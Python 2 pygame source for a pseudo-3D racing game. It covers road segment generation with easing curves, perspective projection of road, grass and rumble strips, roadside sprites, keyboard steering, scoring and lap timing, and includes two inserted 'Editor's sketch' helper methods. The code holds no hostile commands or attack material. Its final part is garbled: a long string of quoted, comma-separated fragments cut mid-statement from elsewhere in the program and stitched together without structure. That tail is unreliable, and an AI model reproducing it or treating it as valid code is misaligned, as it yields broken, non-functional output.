        #print 'rd_seg_init_rand', n
        for i in range(n):
            p = random.random()
            rl = random.choice([1, -1])
            enter = random.randint(10, 40)
            hold = random.randint(10, 40)
            leave = random.randint(10, 40)
            if p < 0.3:
                curve = 0.0
                yw = 0.0
            #elif p < 0.8:
            #    curve = 0.0
            #    yw = random.random() * 10.0
            else:
                curve = rl * random.random() * 6.0
                yw = 0.0
            self.add_road(enter, hold, leave, curve, yw)

    def rd_seg_init_rand_2(self, n=50):
        for i in range(n):
            p = random.random()
            rl = random.choice([1, -1])
            if p < 0.35:
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM'])
            elif p < 0.7:
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY'])
            else:
                enter = random.randint(10, 100)
                hold = random.randint(10, 100)
                leave = random.randint(10, 100)
                self.add_road(enter, hold, leave, 0.0)

    def rd_seg_init_rand_curve(self, n=5):
        #print 'rd_seg_init_rand', n
        for i in range(n):
            rl = random.choice([1, -1])
            enter = random.randint(10, 40)
            hold = random.randint(10, 100)
            leave = random.randint(10, 100)
            curve = rl * random.random() * 8.0
            self.add_road(enter, hold, leave, curve, 0.0)

    def rd_start_seg_init(self, n=3):
        seg_n = len(self.segments)
        if n is None:
            #n = seg_n / 20
            n = 3
        #self.segments[2]['color'] = FP_COLORS['START_Y']
        for i in range(n):
            self.segments[i]['color'] = FP_COLORS['START_Y']

    def rd_sprts_init_rand(self, n=None):
        seg_n = len(self.segments)
        if n is None:
            #n = seg_n / 20
            n = seg_n / random.randint(10, 20)
        for i in range(n):
            j = random.randint(10, seg_n - 10)
            sprt = random.choice(FP_ROAD_SPRTS.keys())
            s = {
                'name': sprt,
                'obj': None,  # need to create at render
                ##'x_i': None,  # use the real (random) x from x_pos
                'x_i': random.randint(0, 4),
                'score': FP_ROAD_SPRTS[sprt].get('score', 0),
            }
            self.segments[j]['sprites'].append(s)

    def rd_sprts_del_all_objs(self):
        for k, sprt in self.rd_sprt_objs.items():
            #print k, sprt
            self.disp_del(sprt)
            del self.rd_sprt_objs[k]

    def util_limit(self, value, mn, mx):
        return max(mn, min(value, mx))

    def util_accelerate(self, v, accel, dt):
        return v + (accel * dt)

    def util_increase(self, start, increment, mx):
        # with looping
        result = start + increment
        while (result >= mx):
            result -= mx
        while (result < 0):
            result += mx
        return result

    def util_ease_in(self, a, b, percent):
        return a + (b - a) * math.pow(percent, 2)

    def util_ease_out(self, a, b, percent):
        return a + (b - a) * (1 - math.pow(1 - percent, 2))

    def util_ease_in_out(self, a, b, percent):
        return a + (b - a) * ((-math.cos(percent * math.pi)/2) + 0.5)

    def util_curve_percent_remaining(self, n, total):
        return (n % total) / total

    def add_road(self, enter, hold, leave, curve, yw=0.0):
        #print enter, hold, leave, curve, yw
        start_y = self.seg_lasy_y()
        end_y = start_y + (int(yw) * self.seg_len)
        total = enter + hold + leave
        for n in range(enter):
            self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter),
                            self.util_ease_out(start_y, end_y, float(n)/total))
        for n in range(hold):
            self.rd_seg_add(curve,
                            self.util_ease_out(start_y, end_y, (float(n)+enter)/total))
        for n in range(leave):
            self.rd_seg_add(self.util_ease_out(curve, 0, float(n)/leave),
                            self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total))

    def add_curves(self):
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], 0.0)

    def add_low_rolling_hills(self, num=None, height=None):
        num = num or FP_ROAD['LENGTH']['SHORT']
        height = height or FP_ROAD['HILL']['LOW']
        self.add_road(num, num, num, 0, height/2.0)
        self.add_road(num, num, num, 0, -height)
        self.add_road(num, num, num, 0, height)
        self.add_road(num, num, num, 0, 0)
        self.add_road(num, num, num, 0, height/2.0)
        self.add_road(num, num, num, 0, 0)

    def rd_seg_get_cleared(self, segs=None):
        if not segs:
            segs = self.segments
        segs_c = []
        for seg in segs:
            if not seg['sprites']:
                segs_c.append(seg)
            else:
                seg_c = {}
                for k, v in seg.items():
                    if k not in ['sprites']:
                        seg_c[k] = v
                    else:
                        seg_c[k] = []
                        for spr in seg['sprites']:
                            spr_n = {}
                            for sk, sv in spr.items():
                                if sk not in ['obj']:
                                    spr_n[sk] = sv
                                else:
                                    spr_n[sk] = None
                            seg_c[k].append(spr_n)
                segs_c.append(seg_c)
        return segs_c

    def rd_seg_json_save(self, f):
        sc = self.rd_seg_get_cleared(self.segments)
        s = utils.json_dumps(sc)
        with open(f, 'w') as fo:
            fo.write(s)

    def rd_seg_json_load(self, f):
        with open(f) as fo:
            s = fo.read()
        segs = utils.json_loads(s)
        return segs
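    # --- Editor's sketch (assumption, not part of the original class): how
    # --- add_road() above shapes curvature. 'enter' eases the curve value in,
    # --- 'hold' keeps it, 'leave' eases it back out, so each segment carries a
    # --- smoothly varying 'curve' field.
    def _demo_curve_profile(self, enter=4, hold=3, leave=4, curve=6.0):
        prof = [self.util_ease_in(0, curve, float(n) / enter) for n in range(enter)]
        prof += [curve] * hold
        prof += [self.util_ease_out(curve, 0, float(n) / leave) for n in range(leave)]
        # e.g. [0.0, 0.375, 1.5, 3.375, 6.0, 6.0, 6.0, 6.0, 3.375, 1.5, 0.375]
        return prof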
    def rd_seg_render__1_o(self):
        """straight"""
        xc1 = self.road_w / 2 - self.player_x
        xc2 = -self.road_w / 2 - self.player_x
        yc = self.camera_h
        print '=' * 80
        print 'self.position', self.position
        for i, seg in enumerate(self.segments):
            zw1 = seg['p1']['world']['z']
            zw2 = seg['p2']['world']['z']
            zc1 = zw1 - self.camera_z - self.position
            zc2 = zw2 - self.camera_z - self.position
            #zc1 = self.position - (zw1 - self.camera_z)
            #zc2 = self.position - (zw2 - self.camera_z)
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc1, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc2, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            # for test
            if i < 10:
                print '>>> ', i
                print 'curve', seg.get('curve', 0.0)
                print xs1, ys1, xs2, ys2
                print xs4, ys4, xs3, ys3
                print '-' * 40
            # grass
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            # road
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])

    def rd_seg_render__2_o(self):
        """curve test 1"""
        #theta_i = math.pi /180.0 * 0.5
        theta_i = math.pi /180.0 * 0.9
        #theta_i = 0.0
        # ... (projection as in rd_seg_render__1_o, then shear the quads)
        for i in range(self.seg_draw_n):
            # ...
            #'''
            #if 1:
            #if i < self.seg_draw_n / 2:
            if i < self.seg_draw_n / 4:
                theta1 = theta_i * i
                theta2 = theta_i * (i + 1)
                dx1 = self.seg_len * math.tan(theta1)
                dx2 = self.seg_len * math.tan(theta2)
                xs1 += dx1
                xs2 += dx1
                xs3 += dx2 #+ dx1
                xs4 += dx2 #+ dx1
            #'''
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])

    def rd_seg_render__3_o(self):
        """curve test 2: draw a circle"""
        #theta_i = math.pi /180.0 * 0.1
        #theta_i = math.pi /180.0 * 0.9
        yc = self.camera_h
        rad = self.seg_len * self.seg_draw_n / 2.0
        rad1 = rad + self.road_w / 2
        rad2 = rad - self.road_w / 2
        # <3>
        #engi = math.pi / 2.0 / self.seg_draw_n
        engi = math.pi / 2.0 / self.seg_draw_n * 4#2
        for i in range(self.seg_draw_n):
            # ...
            #xc1 = self.road_w / 2 - self.player_x - curve_d * i
            #xc2 = -self.road_w / 2 - self.player_x - curve_d * i
            # <3>
            xx1 = rad1 * math.cos(engi * i)
            xx4 = rad1 * math.cos(engi * (i + 1))
            xc1 = (rad - xx1) - self.player_x
            xc4 = (rad - xx4) - self.player_x
            # ... (project and render as above)

    def rd_seg_render(self):
        """curve"""
        yc = self.camera_h
        #print '=' * 80
        #print 'self.position', self.position

        # <2>
        seg_n = len(self.segments)
        segbi = self.get_seg_base_i()
        #print 'segbi', segbi, ' / ', seg_n
        self.player_seg = self.segments[segbi]
        b_curve = self.player_seg.get('curve', 0.0)
        #b_percent = 0.5
        b_percent = self.util_curve_percent_remaining(self.position, self.seg_len)
        dx_curve = - (b_curve * b_percent)
        x_curve = 0
        #print 'b_curve', b_curve
        #print 'world z', self.player_seg['p1']['world']['z']
        #print 'world y', self.player_seg['p1']['world'].get('y', 0.0)

        self.rd_sprt_cache = []
        # <1>
        #for i, seg in enumerate(self.segments):
        # <2>
        for i in range(self.seg_draw_n):
            #'''
            # <2>
            si = (segbi + i) % seg_n
            #print si
            seg = self.segments[si]
            #'''
            if si == segbi:
                self.base_seg = seg

            # <1>
            zw1 = seg['p1']['world']['z']
            zw2 = seg['p2']['world']['z']
            zc1 = zw1 - self.camera_z - (self.position % self.seg_len)
            zc2 = zw2 - self.camera_z - (self.position % self.seg_len)
            '''
            #x#
            zw1 = seg['p1']['world']['z']
            zw2 = seg['p2']['world']['z']
            zc1 = zw1 - self.camera_z - self.position
            zc2 = zw2 - self.camera_z - self.position
            '''

            xc1 = self.road_w / 2 - self.player_x
            xc2 = -self.road_w / 2 - self.player_x
            xc3 = self.road_w / 2 - self.player_x
            xc4 = -self.road_w / 2 - self.player_x
            # for curve
            xc1 = xc1 - x_curve
            xc2 = xc2 - x_curve
            xc3 = xc3 - x_curve - dx_curve
            xc4 = xc4 - x_curve - dx_curve
            x_curve = x_curve + dx_curve
            dx_curve = dx_curve + seg.get('curve', 0.0)

            # for hills
            yw1 = seg['p1']['world'].get('y', 0.0)
            yw2 = seg['p2']['world'].get('y', 0.0)
            yc1 = yc - yw1
            yc2 = yc - yw2
            #print yw1, yw2

            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc1, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc2, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3

            # grass
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            # road
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])
            if 1:#i % 2 == 1:
                # rumble strips
                xcl1 = xc1 - self.lane_w
                xcl2 = xc2 + self.lane_w
                xcl3 = xc3 - self.lane_w
                xcl4 = xc4 + self.lane_w
                xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
                xsl1 = self.xp_to_xs(xpl1, self.w)
                xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
                xsl2 = self.xp_to_xs(xpl2, self.w)
                xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
                xsl3 = self.xp_to_xs(xpl3, self.w)
                xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
                xsl4 = self.xp_to_xs(xpl4, self.w)
                self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3,
                                    seg['color']['rumble'])
                self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4,
                                    seg['color']['rumble'])
                # lane marker
                xcr1 = self.lane_w - self.player_x
                xcr2 = -self.lane_w - self.player_x
                xcr3 = self.lane_w - self.player_x
                xcr4 = -self.lane_w - self.player_x
                xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
                xsr1 = self.xp_to_xs(xpr1, self.w)
                xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
                xsr2 = self.xp_to_xs(xpr2, self.w)
                xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
                xsr3 = self.xp_to_xs(xpr3, self.w)
                xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
                xsr4 = self.xp_to_xs(xpr4, self.w)
                self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3,
                                    seg['color']['rumble'])
                # for test
                #self.pygm.draw.circle(self.surf, consts.BLUE,
                #                      (int(xsr1), 116 - int(ys1)),
                #                      3)

            # sprites
            if seg['sprites'] and not seg['looped']:
                seg_scale = self.geo_prjc_scale(self.d, zc1)
                x_rnd = random.randint(1, self.road_w / 2 - 10) * seg_scale
                x_pos = [xsr1, xsr2,
                         (xsr1 + xsl1) / 2.0, (xsr2 + xsl2) / 2.0,
                         xsl1, xsl2]
                #x_sprt = xsr1
                x_sprt = (xsr1 + xsl1) / 2.0
                #x_sprt = random.choice(x_pos)
                x_i = random.randint(0, len(x_pos) - 1)  # NOTE: not used now !!
                ##x_i = 2
                y_sprt = ys1
                scale_sprt = seg_scale * 8.0#10.0#2.0
                obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)
                if obj:
                    self.rd_sprt_cache.append(obj)

        # render cached sprites with right order
        for obj in self.rd_sprt_cache[::-1]:
            self.disp_add(obj)

    def render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4, y4, color):
        #d = 200#100#240#50#
        #a = 60
        #pnts = [[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]]
        #pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]]
        #pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]]
        # reflect the y-
        d = 116
        pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]]
        c = utils.clr_from_str(color)
        try:
            self.pygm.draw.polygon(self.surf, c, pnts)
        except Exception as e:
            #print '-' * 60
            pass

    def rd_sprts_render(self, seg, x_pos, x_i, y_sprt, scale):
        sprts = seg.get('sprites')
        if not sprts:
            return None
        obj = None
        for info in sprts:
            sprt = info['name']
            obj_k = str(seg['index']) + '_' + sprt
            obj = info.get('obj')
            '''
            # TODO: reuse the created obj
            if not obj:
                obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0])
                info['obj'] = obj
                self.disp_add(obj)
            '''
            # NOTE: objs will be deleted at rd_sprts_del_all_objs()
            ##del self.rd_sprt_objs[obj_k]
            img = FP_ROAD_SPRTS[sprt]['imgs'][0]
            obj = FPSptRdSprts.create_by_img(img)
            # avoid: pygame.error: Width or height is too large
            if scale > 500:
                #print 'scale <1>', scale
                pass
            else:
                try:
                    obj.scale(scale)
                except:
                    #print 'scale <2>', scale
                    pass
            x_i_saved = info.get('x_i')
            #if not x_i_saved:
            #    info['x_i'] = x_i
            #    x_i_saved = x_i
            obj.rect.top = 240 - obj.rect.height
            obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2
            #obj.scale(scale)
            info['obj'] = obj
            ##self.disp_add(obj)  # NOTE: render out here
            self.rd_sprt_objs[obj_k] = obj  # for reset to delete all
            # NOTE: only show one
            break
        return obj

    def handle_event(self, events, *args, **kwargs):
        #print '>>> ', events
        if not self.flag_check_event:
            return events
        else:
            return self.check_key(events)

    def key_to_di(self, k):
        if k == self.pglc.K_UP:
            return 0
        elif k == self.pglc.K_RIGHT:
            return 1
        elif k == self.pglc.K_DOWN:
            return 2
        elif k == self.pglc.K_LEFT:
            return 3
        else:
            return None

    def key_to_di_b(self, k):
        if k == self.pglc.K_f:
            return 1
        elif k == self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_b:
            return 2
        elif k == self.pglc.K_d:
            return 3
        else:
            return None

    def check_key(self, events):
        #print id(events)
        r_events = []
        e_keys_up = []
        e_keys_dn = []
        for event in events:
            #print event
            if event.type == self.pglc.KEYUP:
                di = self.key_to_di(event.key)
                if di is None:
                    di = self.key_to_di_b(event.key)
                if di is not None:
                    e_keys_up.append(di)
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                di = self.key_to_di(event.key)
                if di is None:
                    di = self.key_to_di_b(event.key)
                if di is not None:
                    e_keys_dn.append(di)
                else:
                    r_events.append(event)
            else:
                r_events.append(event)
        self.e_keys_up = e_keys_up
        self.e_keys_dn = e_keys_dn
        return r_events

    def check_player_di(self, e_keys_dn, e_keys_up):
        if 0 in e_keys_dn:
            self.player_go = 1
        elif 2 in e_keys_dn:
            self.player_go = 2
        if 1 in e_keys_dn:
            self.player_di = 1
        elif 3 in e_keys_dn:
            self.player_di = 3
        if 0 in e_keys_up:
            if self.player_go != 2:
                self.player_go = 0
        if 2 in e_keys_up:
            if self.player_go != 1:
                self.player_go = 0
        if 1 in e_keys_up:
            if self.player_di != 3:
                self.player_di = 0
        if 3 in e_keys_up:
            if self.player_di != 1:
                self.player_di = 0

    def update_world(self):
        if self.player_go == 1:
            self.speed += self.speed_dt_up
        elif self.player_go == 2:
            self.speed -= self.speed_dt_dn
        else:
            self.speed -= self.speed_dt_na
        # if on the grass, slow down
        if self.player_x < -self.road_w / 2 or \
                self.player_x > self.road_w / 2:
            self.speed -= self.speed_dt_dn
        self.speed = self.util_limit(self.speed, 0.0, self.speed_max)

        self.position += self.speed
        if self.position > self.track_len:
            self.position -= self.track_len
            # reached the end of this road
            self.game_over = True
            self.game_score = 1.0

        if self.player_di == 1:
            #self.player_x += self.player_x_dt
            self.player_x += self.speed / 5 + 20
        elif self.player_di == 3:
            #self.player_x -= self.player_x_dt
            self.player_x -= self.speed / 5 + 20
        else:
            pass

        p_curve = self.player_seg.get('curve', 0.0)
        #print 'p_curve', p_curve
        p_dt = self.speed * p_curve * self.centrifugal
        #print p_dt
        #self.player_x -= p_dt
        self.player_x += p_dt

    def check_if_car_out_road(self):
        # decrease score when go out the road
        if self.player_x < -self.road_w / 2 or \
                self.player_x > self.road_w / 2:
            if self.score > 0:
                self.score -= 1
            #self.score -= 1
            #if self.score < 0:
            #    self.score = 0
            self.game_over = True
            self.game_score = -1.0

    def check_score(self):
        # make sure to check score once for a segment
        seg_i = self.player_seg['index']
        if seg_i == self.last_seg_i:
            return
        self.last_seg_i = seg_i
        # we should use the segment just under the car
        #sprts = self.player_seg['sprites']
        sprts = self.base_seg['sprites']
        if not sprts:
            return
        # NOTE: we now only use the first sprite
        sprt = sprts[0]
        obj = sprt.get('obj')
        if not obj:
            # None or 0
            return
        x_i = sprt.get('x_i')
        if x_i is None:
            return
        scr = sprt.get('score')
        if not scr:
            return
        #rd_w_half = self.road_w / 2
        #x_pos = [rd_w_half + self.lane_w,
        #         rd_w_half - self.lane_w]
        sprt_x = obj.rect.left
        sprt_w = obj.rect.width
        car_x = self.player_x
        car_w = self.car.rect.width * 2
        sprt_at = 10000
        if x_i == 0:
            sprt_at = 40
        elif x_i == 1:
            sprt_at = -40
        elif x_i == 2:
            sprt_at = 580
        elif x_i == 3:
            sprt_at = -580
        elif x_i == 4:
            sprt_at = 1100
        elif x_i == 5:
            sprt_at = -1100
        #print 'sprt_x', sprt_x
        #print 'car_x', car_x
        #print 'car_w', car_w
        #print (car_x - car_w / 2), sprt_at, (car_x + car_w / 2)
        #if (car_x + car_w / 2) < sprt_x < (car_x + car_w / 2 + sprt_w / 2):
        if (car_x - car_w / 2) < sprt_at < (car_x + car_w / 2):
            self.score += scr

    def check_tm(self):
        # time one run: from the start segments to the last ones
        if self.position < self.seg_len * 2:
            if self.tm_start == 0.0:
                self.tm_start = time.time()
                self.tm_end = self.tm_start
        elif self.position < self.track_len - self.seg_len * 2:
            self.tm_end = time.time()
            self.tm_last_once = self.tm_end - self.tm_start
        else:
            self.tm_start = 0.0
            #self.tm_end = 0.0

    def update_bg(self):
        # always move the cloud
        for sky in self.bg_sky:
            sky.rect.left -= 1#self.sky_speed
            if sky.rect.left + sky.rect.width < 0:
                sky.rect.left += sky.rect.width * 2
            if sky.rect.left - sky.rect.width > 0:
                sky.rect.left -= sky.rect.width * 2
        if self.speed <= 0.0:
            return
        p_curve = self.player_seg.get('curve', 0.0)
        #p_curve = 3
        p_dt = self.speed * p_curve * self.centrifugal
        for hill in self.bg_hills:
            hill.rect.left += int(self.hill_speed * p_dt)
            if hill.rect.left + hill.rect.width < 0:
                hill.rect.left += hill.rect.width * 2
            if hill.rect.left - hill.rect.width > 0:
                hill.rect.left -= hill.rect.width * 2
        for trees in self.bg_trees:
            trees.rect.left += int(self.tree_speed * p_dt)
            if trees.rect.left + trees.rect.width < 0:
                trees.rect.left += trees.rect.width * 2
            if trees.rect.left - trees.rect.width > 0:
                trees.rect.left -= trees.rect.width * 2

    def refresh__1(self, fps_clock, *args, **kwargs):
        #print '>>> refresh'
        # a demo auto-player
        #'''
        if self.player_di == 3:
            # <
            self.player_x -= 9
            if self.player_x < -1000:
                self.player_di = 1
        elif self.player_di == 1:
            self.player_x += 19
            if self.player_x > 1000:
                self.player_di = 3
        #'''
        #'''
        self.position += 10.0#5.0#1.0
        self.position += random.randint(2, 10)
        if self.position > self.track_len:
            self.position -= self.track_len
        #'''
        self.draw_on()
        self.rd_seg_render()

    def refresh(self, fps_clock, *args, **kwargs):
        self.check_player_di(self.e_keys_dn, self.e_keys_up)
        self.draw_on()
        self.rd_seg_render()
        self.update_world()
        self.check_if_car_out_road()
        self.check_score()
        self.check_tm()
        self.update_bg()
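    # --- Editor's sketch (assumption, not part of the original class): one
    # --- point through the projection chain used by rd_seg_render() above.
    # --- A camera-space (xc, yc, zc) is scaled by d/zc onto the projection
    # --- plane, then shifted to screen coordinates around the screen center.
    def _demo_projection(self):
        xc, yc, zc = 1200.0, self.camera_h, 2000.0   # road edge, 2000 units ahead
        xp = self.xc_to_xp(xc, self.d, zc)           # 1200 * (200/2000) = 120.0
        yp = self.yc_to_yp(yc, self.d, zc)           # 500 * (200/2000) = 50.0
        xs = self.xp_to_xs(xp, self.w)               # 640/2 + 120 = 440.0
        ys = self.yp_to_ys(yp, self.h)               # 240/2 - 50 = 70.0
        return xs, ys                                # distant segments -> (320, 120)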
fps_clock,", "b_curve #print 'world z', self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y', 0.0)", "len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi self.player_seg = self.segments[segbi]", "'h': 140 }, 'SEMI': { 'x': 1365, 'y': 490, 'w':", "-5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'], 'score':", "self.rdmap_hide() elif k == self.pglc.K_RETURN: self.road_reset() elif k == self.pglc.K_TAB:", ": hide/show road map * TAB : replay this road", "% 2 == 0: #if n % 4 == 0:", "= -self.lane_w - self.player_x yc = self.camera_h #print '=' *", "3:< self.player_go = 0 # 0:- 1:^ 2:v self.speed_dt_up =", "#print '>>> ', events if not self.flag_check_event: return events else:", "pnts.append([x, y]) #print pnts return pnts def draw_segs(self, segs, rad):", "xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve", "'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' }, 'START': {'road':", "{ 'x': 1205, 'y': 310, 'w': 268, 'h': 170 },", "#print pnts return pnts def get_segs_pnts_1(self, segs, rad): pnts =", "% seg_n #print si seg = self.segments[si] #''' ''' #", "'y': 1097, 'w': 240, 'h': 155 }, 'CACTUS': { 'x':", "<2> seg_n = len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi", "self.player_go = 0 # 0:- 1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0", "+ seg.get('curve', 0.0) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 =", "0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg = None # the segment", "+= curve else: cv_s = 1 continue x += rad_m", "- sky.rect.width > 0: sky.rect.left -= sky.rect.width * 2 if", "rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img) #", "def yp_to_ys(self, yp, h): #ys = h / 2.0 -", "self.player_x += self.speed / 5 + 20 elif self.player_di ==", "self.disp_add(self.car) self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top = 0", "# NOTE: objs will be deleted at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k]", "main(): #sf = GMFlatpath('flatpath <:::>', 640, 480) sf = GMFlatpath('flatpath", "5, 'y': 1097, 'w': 240, 'h': 155 }, 'CACTUS': {", "pos=None): if pos is None: pos = self.position i =", "= float(curve) / rad a *= 10.0 #print a if", "80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018,", "self.seg_len) ''' #x# zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1", "[] # <1> #for i, seg in enumerate(self.segments): # <2>", "#if not x_i_saved: # info['x_i'] = x_i # x_i_saved =", "if zc == 0.0: #yp = float('inf') #yp = 2", "xcl1 = xc1 - self.lane_w xcl2 = xc2 + self.lane_w", "= int(pos / self.seg_len) #x#i = int(utils.math_round(pos / self.seg_len)) #i", "self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg() def check_player_di(self, e_keys_dn,", "*args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2, self.size[1] /", "IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 =", "xsr4, ys4, xsr3, ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf, consts.BLUE,", "= { 'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG':", "obj: obj = 
FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj self.disp_add(obj) ''' #", "- yw2 #print yw1, yw2 xp1 = self.xc_to_xp(xc1, self.d, zc1)", "self.bg_sky1.rect.top = 0 self.bg_sky1.rect.left = 0 self.disp_add(self.bg_sky1) self.bg_sky2 = FPSptBg('img_flatpath/images/background.png',", "< self.seg_draw_n / 2: if i < self.seg_draw_n / 4:", "(zw2 - self.camera_z) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 =", "xsr2, (xsr1 + xsl1) / 2.0, (xsr2 + xsl2) /", "= 4.0#2.0#1.0# cv_s = 0 cv_l = 0.0 pnts.append([x, y])", "segs = utils.json_loads(s) return segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 =", "self.rd_sprt_objs = {} self.rd_sprt_cache = [] # for sprites render", "x_i == 0: sprt_at = 40 elif x_i == 1:", "k == self.pglc.K_d: return 3 else: return None def check_key(self,", "i # <3> xx1 = rad1 * math.cos(engi * i)", "+ xp return xs def yp_to_ys(self, yp, h): #ys =", "2.0 + xp return xs def yp_to_ys(self, yp, h): #ys", "-1.0 elif a > 1.0: a = 1.0 #tht_d =", "theta_i = math.pi /180.0 * 0.9 #theta_i = 0.0 #xc1", "10: print '>>> ', i print 'curve', seg.get('curve', 0.0) print", "self.car.rect.width * 2 sprt_at = 10000 if x_i == 0:", "random.randint(10, 40) hold = random.randint(10, 40) leave = random.randint(10, 40)", "road_reset(self): self.road.rd_reset() self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'):", "'w': 235, 'h': 118 }, 'BUSH2': { 'x': 255, 'y':", "FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left = 610 #self.prog.rotate(180)", "self.xp_to_xs(xp2, self.w) xp3 = self.xc_to_xp(xc3, self.d, zc2) xs3 = self.xp_to_xs(xp3,", "200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0", "10: print xs1, ys1, xs2, ys2 print 